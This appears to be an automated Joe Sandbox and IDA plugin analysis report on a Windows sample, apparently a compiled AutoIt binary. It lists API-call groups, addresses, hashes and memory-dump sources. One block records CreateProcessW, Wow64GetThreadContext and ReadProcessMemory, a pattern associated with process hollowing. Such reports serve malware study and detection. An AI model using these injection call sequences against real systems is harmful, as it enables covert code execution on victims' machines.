              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: CALL
              • API String ID: 0-4196123274
              • Opcode ID: 060f3ffef272b35da3b904bfab278ce52c9da2d2f8d51bd09aad163b5fea3e5d
              • Instruction ID: 9d370eecb7510a9e36ccd2f79ae515b1f5463fee858ef16aedebca8e5e031fab
              • Opcode Fuzzy Hash: 060f3ffef272b35da3b904bfab278ce52c9da2d2f8d51bd09aad163b5fea3e5d
              • Instruction Fuzzy Hash: 00224874508241DFD729EF14C494B2ABBE1BF59300F55895EF8968B262D731EE81CF82
              APIs
              • IsThemeActive.UXTHEME ref: 00184992
                • Part of subcall function 001A35AC: __lock.LIBCMT ref: 001A35B2
                • Part of subcall function 001A35AC: DecodePointer.KERNEL32(00000001,?,001849A7,001D81BC), ref: 001A35BE
                • Part of subcall function 001A35AC: EncodePointer.KERNEL32(?,?,001849A7,001D81BC), ref: 001A35C9
                • Part of subcall function 00184A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00184A73
                • Part of subcall function 00184A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00184A88
                • Part of subcall function 00183B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00183B7A
                • Part of subcall function 00183B4C: IsDebuggerPresent.KERNEL32 ref: 00183B8C
                • Part of subcall function 00183B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002462F8,002462E0,?,?), ref: 00183BFD
                • Part of subcall function 00183B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00183C81
              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001849D2
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
              • String ID:
              • API String ID: 1438897964-0
              • Opcode ID: 88f16c2949006f1cb0b63b4c81a253c275d5efd2bcf0087be00d3f3d0f336ce4
              • Instruction ID: 3a64a805f71970e5f966798042b2d4782f3de084e07e0ee343efd39790fdb654
              • Opcode Fuzzy Hash: 88f16c2949006f1cb0b63b4c81a253c275d5efd2bcf0087be00d3f3d0f336ce4
              • Instruction Fuzzy Hash: 19119A75908311AFC310EF68EC4991AFBF8EBAA750F00451EF455872B1DBB09A49CF92
              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00185981,?,?,?,?), ref: 00185E27
              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00185981,?,?,?,?), ref: 001BE19C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: e422bfb86763879cec5d24b65ecff5186acfefde52b42b3f1f1b4d54604abbc0
              • Instruction ID: a384cc5f6896a4ad94c6d3235ba953e48cd54a29f0ae673054fa42b1e95b0bbe
              • Opcode Fuzzy Hash: e422bfb86763879cec5d24b65ecff5186acfefde52b42b3f1f1b4d54604abbc0
              • Instruction Fuzzy Hash: 99019271284708BEF7245E28DC8AFA67BDDEB01768F108318FAE55A1E1C7B01E498F50
              APIs
                • Part of subcall function 001A594C: __FF_MSGBANNER.LIBCMT ref: 001A5963
                • Part of subcall function 001A594C: __NMSG_WRITE.LIBCMT ref: 001A596A
                • Part of subcall function 001A594C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,001A1013,?), ref: 001A598F
              • std::exception::exception.LIBCMT ref: 001A102C
              • __CxxThrowException@8.LIBCMT ref: 001A1041
                • Part of subcall function 001A87DB: RaiseException.KERNEL32(?,?,?,0023BAF8,00000000,?,?,?,?,001A1046,?,0023BAF8,?,00000001), ref: 001A8830
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
              • String ID:
              • API String ID: 3902256705-0
              • Opcode ID: 952603e724c67129836c6194924c423d975f86541dff661fc0c14b1b8a1959c8
              • Instruction ID: 2e6d43bbd1aedbdf6eaf1f064930ed57a4285352b882a19bb67de33f3aeaaa1e
              • Opcode Fuzzy Hash: 952603e724c67129836c6194924c423d975f86541dff661fc0c14b1b8a1959c8
              • Instruction Fuzzy Hash: 7BF0A47D500319B6CB21AE98ED059DF7BA89F22350F200425F814A6592DFB18AE486E0
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __lock_file_memset
              • String ID:
              • API String ID: 26237723-0
              • Opcode ID: 01073c3224c8c6f347d4820c2127cb1f7ea56512c3befe94fa3ac224d3f4667f
              • Instruction ID: f951ea1fd12655228ca229f1e27fda85b84351e7b477d745b418d86fa0592b4d
              • Opcode Fuzzy Hash: 01073c3224c8c6f347d4820c2127cb1f7ea56512c3befe94fa3ac224d3f4667f
              • Instruction Fuzzy Hash: 1901A779C04609EBCF22AF6A8C0559F7B72AF53760F144215F8245B1A1DB358A21DB91
              APIs
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              • __lock_file.LIBCMT ref: 001A561B
                • Part of subcall function 001A6E4E: __lock.LIBCMT ref: 001A6E71
              • __fclose_nolock.LIBCMT ref: 001A5626
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
              • String ID:
              • API String ID: 2800547568-0
              • Opcode ID: 4ad58bdb1980ee7418ce7f9f2f6bb881b12f3ff5e1b629a8b397e4464a6be444
              • Instruction ID: 263b5c771ce9b8160a1a544a0bebcfce7fa3b33834f3f67cf49afa867d1cda25
              • Opcode Fuzzy Hash: 4ad58bdb1980ee7418ce7f9f2f6bb881b12f3ff5e1b629a8b397e4464a6be444
              • Instruction Fuzzy Hash: 5DF0B479804B059ED721AF79880276E77B26F63334F558209E418AB1C2CF7C89019B55
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 01401ABB
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01401B51
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01401B73
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
              • Instruction ID: 10a932e86f4a82bdb033393677d131bfb9b273aaba52a8aa0ffa33a237f4e4a4
              • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
              • Instruction Fuzzy Hash: 7812DD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7E5E77A4E81CF5A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a6a5500596a0c8a47e6277ae989396da2c42de55b6840e564bd4582c7f840660
              • Instruction ID: 4ab2423d6171c13288229f0ed9b3b1accec8afb4513035526f58965353b72e99
              • Opcode Fuzzy Hash: a6a5500596a0c8a47e6277ae989396da2c42de55b6840e564bd4582c7f840660
              • Instruction Fuzzy Hash: 66517F35600604AFCF14FB64C991FBE77A6AFA5314F158068F906AB392DB30EE00CB51
              APIs
              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00185CF6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e2b24bdda3ae9b6e7fe0fb113eefd9040d3044a9d9e20806a56c2d934bbb5706
              • Instruction ID: 07bd54efce6050ab5baa79b98adf7cdbd3447e56b7aeca4d3247f839fc0fe043
              • Opcode Fuzzy Hash: e2b24bdda3ae9b6e7fe0fb113eefd9040d3044a9d9e20806a56c2d934bbb5706
              • Instruction Fuzzy Hash: 96311C71A00B19AFCB18EF6DC4846ADB7B6FF48310F158629E81993710D771AA50DF90
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClearVariant
              • String ID:
              • API String ID: 1473721057-0
              • Opcode ID: e78fa8038a35d205e7460d60caed5464628f0708dfdb1ca6e6a3f03c0cdeaf0a
              • Instruction ID: 6c9bfbd7704653127f1b7ed9e99673be127c710b76ce0d0e4b6cb170471b4551
              • Opcode Fuzzy Hash: e78fa8038a35d205e7460d60caed5464628f0708dfdb1ca6e6a3f03c0cdeaf0a
              • Instruction Fuzzy Hash: 47414674508341CFDB24DF14C484B1ABBE0BF59318F1989ACE89A8B762C332E985CF52
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: feb66267ce8dae7d3d05077f914b0a3e9c87bbf6eddcaa6f8bfaf92840c974de
              • Instruction ID: ae1d78cf5b30f92d3791078ea938f7cb96d9f99c56ab89c211887d87cf2e019d
              • Opcode Fuzzy Hash: feb66267ce8dae7d3d05077f914b0a3e9c87bbf6eddcaa6f8bfaf92840c974de
              • Instruction Fuzzy Hash: 8F21D230A00A08EBDB146F55F8896EA7FF9FF24380F21846AF886D1411EB7095E08B45
              APIs
                • Part of subcall function 00184D13: FreeLibrary.KERNEL32(00000000,?), ref: 00184D4D
                • Part of subcall function 001A548B: __wfsopen.LIBCMT ref: 001A5496
              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184F6F
                • Part of subcall function 00184CC8: FreeLibrary.KERNEL32(00000000), ref: 00184D02
                • Part of subcall function 00184DD0: _memmove.LIBCMT ref: 00184E1A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Library$Free$Load__wfsopen_memmove
              • String ID:
              • API String ID: 1396898556-0
              • Opcode ID: 51aeac1763226b0d39573c2523939e50801e43a59e12f6df6e66b95a720a9861
              • Instruction ID: 54bc6df20122d525b182ca8ac77eb54c644b117e1b7ca5426c3741d0e26b7920
              • Opcode Fuzzy Hash: 51aeac1763226b0d39573c2523939e50801e43a59e12f6df6e66b95a720a9861
              • Instruction Fuzzy Hash: BD11C431600706ABCB14FF74D812FAE77A99F54714F10842DF941A61C2EF759B159F60
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClearVariant
              • String ID:
              • API String ID: 1473721057-0
              • Opcode ID: bb91433f5432e36e24ef4b9744155427560d25fafd5cd84d339d5876813c08e3
              • Instruction ID: 37a680c94d5e5310335b4d1745f086511ce26bae17a00d548b2ccd22ed4c72a8
              • Instruction Fuzzy Hash: C6212EB4508341DFDB24EF54C484B1ABBE0BF88304F09896CE89A47722D731E845CF52
              APIs
              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00185807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00185D76
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 012fd1fd358eefe8eb57387888d22a5078b1e34fa82588af833f82eebec31cb9
              • Instruction ID: e7755b09ec06ea0499e726e3f596c0bd7da48d9eb7534538412e667dfda70aa8
              • Instruction Fuzzy Hash: EE113A31200B019FD3309F55C488B66B7E6EF45764F10CA2EE8AA86A51D7B1FA45CF60
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
              • Instruction ID: 632243ccfa2324e207ace6a4b2a1947bf25521325201685faea1eb8e031397f4
              • Instruction Fuzzy Hash: B801A779600541AFC305EB29C851D66FBAAFF9A3107148159F815C7702D731FD21CBE0
              APIs
              • __lock_file.LIBCMT ref: 001A4AD6
                • Part of subcall function 001A8D68: __getptd_noexit.LIBCMT ref: 001A8D68
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __getptd_noexit__lock_file
              • String ID:
              • API String ID: 2597487223-0
              • Opcode ID: aebd22211896d9b3c2ff34ae5641405661c6a0d8b58410b2854fc725d1244fa9
              • Instruction ID: 44d84721d43956bdce0c6af108b435f0ec85a2e62a7e214455452006dd4ec24c
              • Instruction Fuzzy Hash: FAF0C8399402099BDF51AFB4CC063EF7661AF52329F044514F414AB1D1CBB88960DF55
              APIs
              • FreeLibrary.KERNEL32(?,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184FDE
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID:
              • API String ID: 3664257935-0
              • Opcode ID: be19275646b7ac919f5015b380b3a9213bf26bfb30902067346631aa51d76419
              • Instruction ID: 7c23e0f3e7900af3b012b7fea03af1f92e99d6e275bd55aa980d2e75ab85065d
              • Instruction Fuzzy Hash: E5F03071505712CFCB34AF68E494812FBE1BF153253218A3EE6D682610CB319944DF40
              APIs
              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A09F4
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LongNamePath_memmove
              • String ID:
              • API String ID: 2514874351-0
              • Opcode ID: c35ff22438be172343df5e77f29b782c74c01dbb3f6e803a07f53fcaec982108
              • Instruction ID: 3f1ea88f7e9203464e4e7bb79edb76ffc6de76c1f16f1346e00ed221e451fc92
              • Instruction Fuzzy Hash: 2EE0CD369442285BC720E6989C05FFA77EDDF887A0F0502B5FC0CD7249DA60AD818690
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID:
              • API String ID: 2638373210-0
              • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
              • Instruction ID: 7e1ba896ef517cb91195514d26ead651302a786a554ae00899417d909f55c289
              • Instruction Fuzzy Hash: 45E092B0104B405FD7348B24D8107E373E1BB16315F00081CF29A83341EB6278418759
              APIs
              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,001BE16B,?,?,00000000), ref: 00185DBF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: cbd9a68a63d1f0ba417f20229570da7d924dd2c740c91a6d0ca37bba62f39af6
              • Instruction ID: 7fd9db45f1b6c76b50227106c579ae5a7777db82ed6176653abcc86c8254218a
              • Instruction Fuzzy Hash: 8DD0C77564030CBFE710DB80DC46FA9B77CD705710F100194FD0456690D6B27D508795
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __wfsopen
              • String ID:
              • API String ID: 197181222-0
              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
              • Instruction ID: 68cf261329a21f97298e1b4c7b8baf2a8331f8b6a15e1e2f2ff8059318a4a3e2
              • Instruction Fuzzy Hash: 2FB0927A84420C7BDF012E82EC02A593F1A9B55678F808020FB0C18162A673A6A09689
              APIs
              • GetLastError.KERNEL32(00000002,00000000), ref: 001ED46A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorLast
              • String ID:
              • API String ID: 1452528299-0
              • Opcode ID: b7a0c3dd225d7ce59f2e133fcd1c1c8724703a9608066f366ac1dcf3afdb089a
              • Instruction ID: 03e1ddead0142ac99e0ee5b78fb6c640f1fd212243bb1f4665992c24db0db8c5
              • Instruction Fuzzy Hash: 677162342047418FC718EF25D4D1A6EB7E1AFA8714F14456DF8969B2A1DB30EE05CF52
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
